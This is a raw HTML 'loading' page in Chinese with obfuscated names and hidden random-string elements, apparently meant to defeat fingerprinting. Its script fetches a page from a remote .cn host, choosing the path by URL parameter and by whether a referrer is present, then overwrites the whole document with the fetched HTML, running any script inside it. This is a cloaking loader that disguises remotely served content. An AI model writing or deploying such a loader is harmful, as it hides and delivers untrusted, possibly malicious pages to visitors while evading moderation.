<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TK6wnVc5agx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TK6wnVc5agx .EupKqoKP9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TK6wnVc5agx .content {
            line-height: 50px;
            text-align: center
        }

        .TK6wnVc5agx .img {
            width: 100%
        }

        .TK6wnVc5agx .eSfwRfOt {
            text-align: center
        }

        .TK6wnVc5agx .eSfwRfOt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TK6wnVc5agx .eSfwRfOt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TK6wnVc5agx .eSfwRfOt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TK6wnVc5agx .eSfwRfOt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TK6wnVc5agx .eSfwRfOt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TK6wnVc5agx .eSfwRfOt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TK6wnVc5agx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mrKfJCcm5yf6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KTbb8Ij = mrKfJCcm5yf6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KTbb8Ij +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KTbb8Ij +".html?a=share";
		}
		
        uawT0wg=url+"#"+new Date().getTime();
        uawT0wg && function() {
            $.get(uawT0wg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>TxpbnGYQXTOY5CDE7vFtwtr8MZYmhExOrqkfJx4YFYa8Vtp904wYlWG3QnqIbTvJrs144h978EGZ8wW9NrKA</span>
<h1 style='display:none' >t8c6nAWDZ8meL5zLSpM50dUwkdeNgcy5rJgrBP</h1>
<a  href='#' style='display:none'>NuRI45NcmSVlsa1utfZgmialY5SreLmK37GvPcpamO9TKy65iBgklqaikTuN8bRhBLmfikqi6PxfF4OTi6VtbAHyB</a><div class="TK6wnVc5agx">
    <div class="EupKqoKP9">
        <div class="eSfwRfOt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >T0VsxGmtQ7Yncr5vftJoD</b>
<ul style='display:none' >lXoiQxLfCZp8lEjyXH2T0QdrdbbKl9ODVzpoVvgl5xIc1jRPd5lFTuMJ4ZtoqbrSqT1GwrvKQduJTHusNqQYBzYjOzu</ul>
<div style='display:none'>Q5ciy8QOfM6GDtF63XrHYzS8dFtfX9nDMo01iLyrojrBeMdIrpk0</div></body>
</html>